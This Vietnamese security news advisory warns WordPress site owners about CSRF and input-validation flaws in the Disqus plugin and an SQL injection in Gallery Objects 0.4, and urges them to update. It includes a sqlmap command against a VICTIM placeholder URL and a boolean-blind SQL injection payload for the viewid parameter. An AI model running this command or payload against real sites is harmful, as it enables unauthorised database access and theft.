Cảnh báo lỗ hổng trong Plugin Disqus và Gallery Objects của WordPress

Nhiều lỗ hổng nguy hiểm nằm trong các plugin của WordPress đã được phát hiện. SecurityDaily cảnh báo các quản trị website đang sử dụng WordPress nên cập nhật các plugin để đảm bảo an ninh cho website của mình.

Nhiều lỗ hổng đang tồn tại trong Disqus Plugin

Disqus là một hệ thống bình luận miễn phí có thể tích hợp trên nhiều nền tảng web khác nhau. Disqus có một giao diện đẹp, bắt mắt nên được nhiều người ưa chuộng và sử dụng. Disqus được sử dụng nhiều trên wordpress với hơn 1.4 triệu lượt download. Các trang web lớn như: CNN, Thehackernews… đều đang sử dụng Plugin này.

Tuy nhiên một số vấn đề bảo mật trong plugin disqus vừa được phát hiện và công bố có thể ảnh hưởng đế người sử dụng. Cách tốt nhất để khắc phục các vấn đề này là người dùng, các quản trị nên cập nhật lên phiên bản mới nhất của Disqus ngay để tránh các vấn đề an ninh có thể xảy ra.

Các lỗ hổng được phát hiện bao gồm:

  • 2 Lỗ hổng CSRF trong file Manage.php và không kiểm tra việc xóa và reset plugin.
  • Lỗ hổng thứ 3 xảy ra do hệ thống chưa kiểm tra tốt các dữ liệu đầu vào của hệ thống trong việc Update Plugin này.

Lỗ hổng SQLi trong Plugin: WordPress Gallery Objects 0.4

Lỗ hổng xảy ra khi hệ thống không kiểm duyệt biến view_id và hacker có thể chèn các mã độc SQL để khai thác hệ thống.

sqlmap -u “http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html” -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
Hiện tại lỗ hổng này đang được rao bán miễn phí trên hệ thống 1337day.com – hệ thống trao đổi và mua bán các lỗ hổng, mã khai thác.